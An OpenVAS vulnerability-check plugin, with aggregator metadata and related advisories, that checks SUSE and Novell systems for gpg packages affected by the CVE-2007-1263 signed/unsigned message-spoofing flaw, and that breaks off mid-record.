ID OPENVAS:850102 Type openvas Reporter Copyright (C) 2009 Greenbone Networks GmbH Modified 2017-12-08T00:00:00
Description
Check for the Version of gpg
###############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_suse_2007_024.nasl 8050 2017-12-08 09:34:29Z santu $
#
# SuSE Update for gpg SUSE-SA:2007:024
#
# Authors:
# System Generated Check
#
# Copyright:
# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
include("revisions-lib.inc");
tag_insight = "When printing a text stream with a GPG signature it was possible
for an attacker to create a stream with "unsigned text, signed text"
where both unsigned and signed text would be shown without distinction
which one was signed and which part wasn't.
This problem is tracked by the Mitre CVE ID CVE-2007-1263.
The update introduces a new option --allow-multiple-messages to print
out such messages in the future, by default it only prints and handles
the first one.
gpg2 and various clients using GPG to check digital signatures are
affected too, but will be fixed separately.";
tag_impact = "signature bypassing";
tag_affected = "gpg on SUSE LINUX 10.1, openSUSE 10.2, SuSE Linux Enterprise Server 8, SUSE SLES 9, Novell Linux Desktop 9, Open Enterprise Server, Novell Linux POS 9, SUSE SLED 10, SUSE SLES 10";
tag_solution = "Please Install the Updated Packages.";
if(description)
{
script_id(850102);
script_version("$Revision: 8050 $");
script_tag(name:"last_modification", value:"$Date: 2017-12-08 10:34:29 +0100 (Fri, 08 Dec 2017) $");
script_tag(name:"creation_date", value:"2009-01-28 13:40:10 +0100 (Wed, 28 Jan 2009)");
script_tag(name:"cvss_base", value:"5.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:P/A:N");
script_xref(name: "SUSE-SA", value: "2007-024");
script_cve_id("CVE-2007-1263");
script_name( "SuSE Update for gpg SUSE-SA:2007:024");
script_summary("Check for the Version of gpg");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (C) 2009 Greenbone Networks GmbH");
script_family("SuSE Local Security Checks");
script_dependencies("gather-package-list.nasl");
script_mandatory_keys("ssh/login/suse", "ssh/login/rpms");
script_tag(name : "impact" , value : tag_impact);
script_tag(name : "affected" , value : tag_affected);
script_tag(name : "solution" , value : tag_solution);
script_tag(name : "insight" , value : tag_insight);
script_tag(name:"qod_type", value:"package");
script_tag(name:"solution_type", value:"VendorFix");
exit(0);
}
include("pkg-lib-rpm.inc");
release = get_kb_item("ssh/login/release");
res = "";
if(release == NULL){
exit(0);
}
if(release == "openSUSE10.2")
{
if ((res = isrpmvuln(pkg:"gpg", rpm:"gpg~1.4.5~24.4", rls:"openSUSE10.2")) != NULL)
{
security_message(data:res);
exit(0);
}
if (__pkg_match) exit(99); # Not vulnerable.
exit(0);
}
if(release == "SLES10")
{
if ((res = isrpmvuln(pkg:"gpg", rpm:"gpg~1.2.4~68.25", rls:"SLES10")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"gpg", rpm:"gpg~1.2.2rc1~128", rls:"SLES10")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"gpg", rpm:"gpg~1.0.7~195", rls:"SLES10")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"gpg", rpm:"gpg~1.4.2~23.16", rls:"SLES10")) != NULL)
{
security_message(data:res);
exit(0);
}
if (__pkg_match) exit(99); # Not vulnerable.
exit(0);
}
if(release == "SLESSr8")
{
if ((res = isrpmvuln(pkg:"gpg", rpm:"gpg~1.2.4~68.25", rls:"SLESSr8")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"gpg", rpm:"gpg~1.2.2rc1~128", rls:"SLESSr8")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"gpg", rpm:"gpg~1.0.7~195", rls:"SLESSr8")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"gpg", rpm:"gpg~1.4.2~23.16", rls:"SLESSr8")) != NULL)
{
security_message(data:res);
exit(0);
}
if (__pkg_match) exit(99); # Not vulnerable.
exit(0);
}
if(release == "NLPOS9")
{
if ((res = isrpmvuln(pkg:"gpg", rpm:"gpg~1.2.4~68.25", rls:"NLPOS9")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"gpg", rpm:"gpg~1.2.2rc1~128", rls:"NLPOS9")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"gpg", rpm:"gpg~1.0.7~195", rls:"NLPOS9")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"gpg", rpm:"gpg~1.4.2~23.16", rls:"NLPOS9")) != NULL)
{
security_message(data:res);
exit(0);
}
if (__pkg_match) exit(99); # Not vulnerable.
exit(0);
}
if(release == "OES")
{
if ((res = isrpmvuln(pkg:"gpg", rpm:"gpg~1.2.4~68.25", rls:"OES")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"gpg", rpm:"gpg~1.2.2rc1~128", rls:"OES")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"gpg", rpm:"gpg~1.0.7~195", rls:"OES")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"gpg", rpm:"gpg~1.4.2~23.16", rls:"OES")) != NULL)
{
security_message(data:res);
exit(0);
}
if (__pkg_match) exit(99); # Not vulnerable.
exit(0);
}
if(release == "SLES9")
{
if ((res = isrpmvuln(pkg:"gpg", rpm:"gpg~1.2.4~68.25", rls:"SLES9")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"gpg", rpm:"gpg~1.2.2rc1~128", rls:"SLES9")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"gpg", rpm:"gpg~1.0.7~195", rls:"SLES9")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"gpg", rpm:"gpg~1.4.2~23.16", rls:"SLES9")) != NULL)
{
security_message(data:res);
exit(0);
}
if (__pkg_match) exit(99); # Not vulnerable.
exit(0);
}
if(release == "NLDk9")
{
if ((res = isrpmvuln(pkg:"gpg", rpm:"gpg~1.2.4~68.25", rls:"NLDk9")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"gpg", rpm:"gpg~1.2.2rc1~128", rls:"NLDk9")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"gpg", rpm:"gpg~1.0.7~195", rls:"NLDk9")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"gpg", rpm:"gpg~1.4.2~23.16", rls:"NLDk9")) != NULL)
{
security_message(data:res);
exit(0);
}
if (__pkg_match) exit(99); # Not vulnerable.
exit(0);
}
if(release == "SL10.1")
{
if ((res = isrpmvuln(pkg:"gpg", rpm:"gpg~1.4.2~23.16", rls:"SL10.1")) != NULL)
{
security_message(data:res);
exit(0);
}
if (__pkg_match) exit(99); # Not vulnerable.
exit(0);
}
if(release == "SLED10")
{
if ((res = isrpmvuln(pkg:"gpg", rpm:"gpg~1.2.4~68.25", rls:"SLED10")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"gpg", rpm:"gpg~1.2.2rc1~128", rls:"SLED10")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"gpg", rpm:"gpg~1.0.7~195", rls:"SLED10")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"gpg", rpm:"gpg~1.4.2~23.16", rls:"SLED10")) != NULL)
{
security_message(data:res);
exit(0);
}
if (__pkg_match) exit(99); # Not vulnerable.
exit(0);
}
{"id": "OPENVAS:850102", "type": "openvas", "bulletinFamily": "scanner", "title": "SuSE Update for gpg SUSE-SA:2007:024", "description": "Check for the Version of gpg", "published": "2009-01-28T00:00:00", "modified": "2017-12-08T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=850102", "reporter": "Copyright (C) 2009 Greenbone Networks GmbH", "references": ["2007-024"], "cvelist": ["CVE-2007-1263"], "lastseen": "2017-12-12T11:21:30", "viewCount": 3, "enchantments": {"score": {"value": 5.8, "vector": "NONE", "modified": "2017-12-12T11:21:30", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-1263"]}, {"type": "ubuntu", "idList": ["USN-432-2", "USN-432-1"]}, {"type": "openvas", "idList": ["OPENVAS:840054", "OPENVAS:830318", "OPENVAS:58121", "OPENVAS:1361412562310830318", "OPENVAS:136141256231065441", "OPENVAS:840050", "OPENVAS:58131", "OPENVAS:136141256231058131", "OPENVAS:65441"]}, {"type": "slackware", "idList": ["SSA-2007-066-01"]}, {"type": "osvdb", "idList": ["OSVDB:33501"]}, {"type": "centos", "idList": ["CESA-2007:0106-01", "CESA-2007:0106"]}, {"type": "suse", "idList": ["SUSE-SA:2007:024"]}, {"type": "exploitdb", "idList": ["EDB-ID:29689"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1266-1:A92B6"]}, {"type": "oraclelinux", "idList": ["ELSA-2007-0106", "ELSA-2007-0107"]}, {"type": "redhat", "idList": ["RHSA-2007:0107", "RHSA-2007:0106"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2007-0106.NASL", "FEDORA_2007-316.NASL", "SUSE_GPG-2995.NASL", "DEBIAN_DSA-1266.NASL", "REDHAT-RHSA-2007-0107.NASL", "ORACLELINUX_ELSA-2007-0107.NASL", "SUSE_GPG-2994.NASL", "SLACKWARE_SSA_2007-066-01.NASL", "UBUNTU_USN-432-2.NASL", "FEDORA_2007-315.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7351", "SECURITYVULNS:DOC:16265"]}, {"type": "drupal", "idList": ["DRUPAL-SA-2007-024"]}], "modified": "2017-12-12T11:21:30", "rev": 2}, "vulnersScore": 5.8}, "pluginID": "850102", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2007_024.nasl 8050 2017-12-08 09:34:29Z santu $\n#\n# SuSE Update for gpg SUSE-SA:2007:024\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"When printing a text stream with a GPG signature it was possible\n for an attacker to create a stream with "unsigned text, signed text"\n where both unsigned and signed text would be shown without distinction\n which one was signed and which part wasn't.\n\n This problem is tracked by the Mitre CVE ID CVE-2007-1263.\n\n The update introduces a new option --allow-multiple-messages to print\n out such messages in the future, by default it only prints and handles\n the first one.\n\n gpg2 and various clients using GPG to check digital signatures are\n affected too, but will be fixed separately.\";\n\ntag_impact = \"signature bypassing\";\ntag_affected = \"gpg on SUSE LINUX 10.1, openSUSE 10.2, SuSE Linux Enterprise Server 8, SUSE SLES 9, Novell Linux Desktop 9, Open Enterprise Server, Novell Linux POS 9, SUSE SLED 10, SUSE SLES 10\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_id(850102);\n script_version(\"$Revision: 8050 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-08 10:34:29 +0100 (Fri, 08 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-01-28 13:40:10 +0100 (Wed, 28 Jan 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_xref(name: \"SUSE-SA\", value: \"2007-024\");\n script_cve_id(\"CVE-2007-1263\");\n script_name( \"SuSE Update for gpg SUSE-SA:2007:024\");\n\n script_summary(\"Check for the Version of gpg\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE10.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"gpg\", rpm:\"gpg~1.4.5~24.4\", rls:\"openSUSE10.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"SLES10\")\n{\n\n if ((res = isrpmvuln(pkg:\"gpg\", rpm:\"gpg~1.2.4~68.25\", rls:\"SLES10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gpg\", rpm:\"gpg~1.2.2rc1~128\", rls:\"SLES10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gpg\", rpm:\"gpg~1.0.7~195\", rls:\"SLES10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gpg\", rpm:\"gpg~1.4.2~23.16\", rls:\"SLES10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"SLESSr8\")\n{\n\n if ((res = isrpmvuln(pkg:\"gpg\", rpm:\"gpg~1.2.4~68.25\", rls:\"SLESSr8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gpg\", rpm:\"gpg~1.2.2rc1~128\", rls:\"SLESSr8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gpg\", rpm:\"gpg~1.0.7~195\", rls:\"SLESSr8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gpg\", rpm:\"gpg~1.4.2~23.16\", rls:\"SLESSr8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"NLPOS9\")\n{\n\n if ((res = isrpmvuln(pkg:\"gpg\", rpm:\"gpg~1.2.4~68.25\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gpg\", rpm:\"gpg~1.2.2rc1~128\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gpg\", rpm:\"gpg~1.0.7~195\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gpg\", rpm:\"gpg~1.4.2~23.16\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"OES\")\n{\n\n if ((res = isrpmvuln(pkg:\"gpg\", rpm:\"gpg~1.2.4~68.25\", rls:\"OES\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gpg\", rpm:\"gpg~1.2.2rc1~128\", rls:\"OES\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gpg\", rpm:\"gpg~1.0.7~195\", rls:\"OES\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gpg\", rpm:\"gpg~1.4.2~23.16\", rls:\"OES\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"SLES9\")\n{\n\n if ((res = isrpmvuln(pkg:\"gpg\", rpm:\"gpg~1.2.4~68.25\", rls:\"SLES9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gpg\", rpm:\"gpg~1.2.2rc1~128\", rls:\"SLES9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gpg\", rpm:\"gpg~1.0.7~195\", rls:\"SLES9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gpg\", rpm:\"gpg~1.4.2~23.16\", rls:\"SLES9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"NLDk9\")\n{\n\n if ((res = isrpmvuln(pkg:\"gpg\", rpm:\"gpg~1.2.4~68.25\", rls:\"NLDk9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gpg\", rpm:\"gpg~1.2.2rc1~128\", rls:\"NLDk9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gpg\", rpm:\"gpg~1.0.7~195\", rls:\"NLDk9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gpg\", rpm:\"gpg~1.4.2~23.16\", rls:\"NLDk9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"SL10.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"gpg\", rpm:\"gpg~1.4.2~23.16\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"SLED10\")\n{\n\n if ((res = isrpmvuln(pkg:\"gpg\", rpm:\"gpg~1.2.4~68.25\", rls:\"SLED10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gpg\", rpm:\"gpg~1.2.2rc1~128\", rls:\"SLED10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gpg\", rpm:\"gpg~1.0.7~195\", rls:\"SLED10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gpg\", rpm:\"gpg~1.4.2~23.16\", rls:\"SLED10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "naslFamily": "SuSE Local Security Checks"}
{"cve": [{"lastseen": "2021-02-02T05:31:21", "description": "GnuPG 1.4.6 and earlier and GPGME before 1.1.4, when run from the command line, does not visually distinguish signed and unsigned portions of OpenPGP messages with multiple components, which might allow remote attackers to forge the contents of a message without detection.", "edition": 6, "cvss3": {}, "published": "2007-03-06T20:19:00", "title": "CVE-2007-1263", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-1263"], "modified": "2018-10-16T16:37:00", "cpe": ["cpe:/a:gnu:gpgme:1.1.3", "cpe:/a:gnupg:gnupg:1.4.6"], "id": "CVE-2007-1263", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1263", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:gnupg:gnupg:1.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gpgme:1.1.3:*:*:*:*:*:*:*"]}], "ubuntu": [{"lastseen": "2020-07-09T00:23:14", "bulletinFamily": "unix", "cvelist": ["CVE-2007-1263"], "description": "Gerardo Richarte from Core Security Technologies discovered that when \ngnupg is used without --status-fd, there is no way to distinguish \ninitial unsigned messages from a following signed message. An attacker \ncould inject an unsigned message, which could fool the user into \nthinking the message was entirely signed by the original sender.", "edition": 6, "modified": "2007-03-08T00:00:00", "published": "2007-03-08T00:00:00", "id": "USN-432-1", "href": "https://ubuntu.com/security/notices/USN-432-1", "title": "GnuPG vulnerability", "type": "ubuntu", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-07-09T00:32:34", "bulletinFamily": "unix", "cvelist": ["CVE-2007-1263"], "description": "USN-432-1 fixed a vulnerability in GnuPG. This update provides the \ncorresponding updates for GnuPG2 and the GPGME library.\n\nOriginal advisory details:\n\nGerardo Richarte from Core Security Technologies discovered that when \ngnupg is used without --status-fd, there is no way to distinguish \ninitial unsigned messages from a following signed message. An attacker \ncould inject an unsigned message, which could fool the user into \nthinking the message was entirely signed by the original sender.", "edition": 6, "modified": "2007-03-13T00:00:00", "published": "2007-03-13T00:00:00", "id": "USN-432-2", "href": "https://ubuntu.com/security/notices/USN-432-2", "title": "GnuPG2, GPGME vulnerability", "type": "ubuntu", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "openvas": [{"lastseen": "2017-07-24T12:56:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-1263"], "description": "Check for the Version of gnupg", "modified": "2017-07-06T00:00:00", "published": "2009-04-09T00:00:00", "id": "OPENVAS:830318", "href": "http://plugins.openvas.org/nasl.php?oid=830318", "type": "openvas", "title": "Mandriva Update for gnupg MDKSA-2007:059 (gnupg)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for gnupg MDKSA-2007:059 (gnupg)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"GnuPG prior to 1.4.7 and GPGME prior to 1.1.4, when run from the\n command\n line, did not visually distinguish signed and unsigned portions of\n OpenPGP messages with multiple components. This could allow a remote\n attacker to forge the contents of an email message without detection.\n\n GnuPG 1.4.7 is being provided with this update and GPGME has been\n patched on Mandriva 2007.0 to provide better visual notification on\n these types of forgeries.\";\n\ntag_affected = \"gnupg on Mandriva Linux 2006.0,\n Mandriva Linux 2006.0/X86_64,\n Mandriva Linux 2007.0,\n Mandriva Linux 2007.0/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2007-03/msg00011.php\");\n script_id(830318);\n script_version(\"$Revision: 6568 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:04:21 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-09 13:53:01 +0200 (Thu, 09 Apr 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_xref(name: \"MDKSA\", value: \"2007:059\");\n script_cve_id(\"CVE-2007-1263\");\n script_name( \"Mandriva Update for gnupg MDKSA-2007:059 (gnupg)\");\n\n script_summary(\"Check for the Version of gnupg\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2007.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"gnupg\", rpm:\"gnupg~1.4.7~0.2mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgpgme11\", rpm:\"libgpgme11~1.1.2~2.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgpgme11-devel\", rpm:\"libgpgme11-devel~1.1.2~2.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gpgme\", rpm:\"gpgme~1.1.2~2.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64gpgme11\", rpm:\"lib64gpgme11~1.1.2~2.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64gpgme11-devel\", rpm:\"lib64gpgme11-devel~1.1.2~2.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2006.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"gnupg\", rpm:\"gnupg~1.4.7~0.2.20060mdk\", rls:\"MNDK_2006.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-07-26T08:56:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-1263"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n gpg\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5020588 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2017-07-11T00:00:00", "published": "2009-10-10T00:00:00", "id": "OPENVAS:65441", "href": "http://plugins.openvas.org/nasl.php?oid=65441", "type": "openvas", "title": "SLES9: Security update for gpg", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5020588.nasl 6666 2017-07-11 13:13:36Z cfischer $\n# Description: Security update for gpg\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that 